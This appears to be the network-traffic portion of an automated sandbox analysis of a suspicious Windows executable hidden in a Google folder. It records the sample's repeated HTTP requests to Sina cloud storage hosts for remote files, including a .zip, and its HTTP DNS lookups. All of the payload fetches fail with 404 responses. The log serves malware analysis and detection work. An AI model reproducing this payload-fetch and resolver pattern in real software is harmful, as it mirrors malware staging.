                                                                                Data Raw: 64 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 76 63 38 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 34 37 37 32 62 31 62 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 30 37 2d 30 34 37 62 63 62 34 62 36 35 31 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>74772b1b-2412-0521-2607-047bcb4b651c</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                46192.168.2.54986227.221.16.179805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:08.349941969 CET231OUTGET /question/vc8 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:10.089207888 CET499INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:26:07 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 5a8ef9de-2412-0521-2609-6c92bfce66fe
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 76 63 38 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 35 61 38 65 66 39 64 65 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 30 39 2d 36 63 39 32 62 66 63 65 36 36 66 65 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d5<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/vc8</Resource> <RequestId>5a8ef9de-2412-0521-2609-6c92bfce66fe</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                47192.168.2.549879123.126.45.208805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:15.859374046 CET237OUTGET /question/s6paies HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:17.393886089 CET527INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22080916-2b967e2
                                                                                Date: Thu, 05 Dec 2024 13:26:17 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: c02a2939-2412-0521-2617-0894eff93358
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 63 30 32 61 32 39 33 39 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 31 37 2d 30 38 39 34 65 66 66 39 33 33 35 38 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>c02a2939-2412-0521-2617-0894eff93358</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                48192.168.2.549883183.60.95.221805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:17.521855116 CET237OUTGET /question/s6paies HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:19.079374075 CET527INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:26:18 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 2c86e030-2412-0521-2618-5ca7213e02e6
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 32 63 38 36 65 30 33 30 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 31 38 2d 35 63 61 37 32 31 33 65 30 32 65 36 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>2c86e030-2412-0521-2618-5ca7213e02e6</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                49192.168.2.549889183.60.95.221805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:19.401590109 CET236OUTGET /question/s6paies HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:20.950156927 CET527INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:26:20 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 76c94694-2412-0521-2620-5ca7213e04cc
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 63 39 34 36 39 34 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 32 30 2d 35 63 61 37 32 31 33 65 30 34 63 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>76c94694-2412-0521-2620-5ca7213e04cc</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                50192.168.2.549892119.29.29.29805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:21.080108881 CET80OUTGET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:26:22.302628040 CET114INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                51192.168.2.549893182.254.116.116805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:21.082573891 CET83OUTGET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                52192.168.2.54989849.7.37.97805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:22.428438902 CET236OUTGET /question/s6paies HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:26.970990896 CET527INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:26:26 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32a99b11-2412-0521-2626-b4055d752a1d
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 61 39 39 62 31 31 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 32 36 2d 62 34 30 35 35 64 37 35 32 61 31 64 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>32a99b11-2412-0521-2626-b4055d752a1d</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                53192.168.2.54990927.221.16.149805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:27.235205889 CET235OUTGET /question/s6paies HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:29.016957045 CET503INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:26:19 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 3528eba9-2412-0521-2628-6c92bfce66d4
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 32 38 65 62 61 39 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 32 38 2d 36 63 39 32 62 66 63 65 36 36 64 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>3528eba9-2412-0521-2628-6c92bfce66d4</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                54192.168.2.54991527.221.16.179805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:29.143914938 CET235OUTGET /question/s6paies HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:30.978671074 CET503INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:26:28 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 769b6110-2412-0521-2630-5ca7213e02f2
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 39 62 36 31 31 30 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 33 30 2d 35 63 61 37 32 31 33 65 30 32 66 32 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>769b6110-2412-0521-2630-5ca7213e02f2</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                55192.168.2.549920119.29.29.29805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:31.110945940 CET79OUTGET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:26:32.332231998 CET131INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 27
                                                                                Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 37 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 34 39
                                                                                Data Ascii: 27.221.16.179;27.221.16.149


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                56192.168.2.549922114.114.114.114805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:31.111548901 CET82OUTGET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                57192.168.2.549921182.254.116.116805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:31.111598969 CET82OUTGET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:26:32.876100063 CET131INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 27
                                                                                Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 37 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 34 39
                                                                                Data Ascii: 27.221.16.179;27.221.16.149


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                58192.168.2.54992427.221.16.179805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:32.694230080 CET235OUTGET /question/s6paies HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:34.480926991 CET503INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:26:31 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32a9dada-2412-0521-2634-b4055d752e03
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 61 39 64 61 64 61 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 33 34 2d 62 34 30 35 35 64 37 35 32 65 30 33 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>32a9dada-2412-0521-2634-b4055d752e03</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                59192.168.2.54993027.221.16.149805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:34.605550051 CET235OUTGET /question/s6paies HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:36.456247091 CET503INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:26:27 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 7671a9bf-2412-0521-2636-3868dd5cd1c8
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 73 36 70 61 69 65 73 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 37 31 61 39 62 66 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 33 36 2d 33 38 36 38 64 64 35 63 64 31 63 38 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d9<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/s6paies</Resource> <RequestId>7671a9bf-2412-0521-2636-3868dd5cd1c8</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                60192.168.2.549936183.60.95.221805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:36.582461119 CET241OUTGET /question/o6saettr.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:38.138217926 CET532INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:26:37 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 7662ae9d-2412-0521-2637-28dee5e81b8d
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 36 32 61 65 39 64 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 33 37 2d 32 38 64 65 65 35 65 38 31 62 38 64 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>7662ae9d-2412-0521-2637-28dee5e81b8d</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                61192.168.2.549942114.114.114.114805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:38.270463943 CET83OUTGET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                62192.168.2.549943182.254.116.116805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:38.270967007 CET83OUTGET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:26:39.844280005 CET114INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                63192.168.2.549944119.29.29.29805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:38.271783113 CET80OUTGET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
